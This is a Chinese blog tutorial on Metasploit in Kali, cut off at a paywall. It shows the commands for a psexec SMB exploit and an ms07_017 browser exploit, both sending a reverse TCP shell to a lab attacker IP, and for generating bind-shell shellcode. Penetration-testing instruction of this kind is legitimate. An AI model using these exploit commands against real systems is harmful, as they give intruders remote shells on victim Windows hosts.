【kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter

于 2021-10-27 16:18:22 发布
阅读量1.3k 收藏 1
点赞数
文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/grb819/article/details/120960508
版权

这里写自定义目录标题

Exploit模块

1. Active exploit

攻击者主动连接受害者
payload发给受害者执行

psexec


use exploit/windows/smb/psexec


# 基于smb协议
# 需要目标机的权限
# 利用psexec模块
# 在132上执行该模块的payload后将shell反弹给161kali的4444端口

set RHOST 192.168.98.131
set SMBUser grb
set SMBPass grb
set payload windows/shell/reverse_tcp

# 设置攻击机IP
set lhost 192.168.98.161

show options
# 在132上执行该模块的payload后将shell反弹给161kali的4444端口


exploit

sessions -i 1 # 进入shell

在这里插入图片描述

2. Passive Exploits

攻击者等待受害者来触发连接,反弹到攻击者
payload在攻击者,等待受害者触发

# winXP sp2
# 打开XP的防火墙
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
set URIPATH /
set SRVHOST 0.0.0.0
set PAYLOAD windows/shell/reverse_tcp
set EXITFUNC thread
set LHOST 192.168.98.161
set LPORT 4444
exploit

payload

1. 用法

msf > search ms08-067
msf > use payload/windows/shell/bind_tcp
msf payload(windows/shell/bind_tcp) > generate  #获得shellcode
msf payload(windows/shell/bind_tcp) > generate -h
    Usage: generate [options]
    Generates a payload.
    OPTIONS:
        -E        强制编码。
        -b <opt>  要避免的字符列表:'\ x00 \ xff'
        -e <opt>  要使用的编码器模块的名称。
        -f <opt>  输出文件名(否则为stdout)
        -h        帮助横幅。
        -i <
最低0.47元/天 解锁文章
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值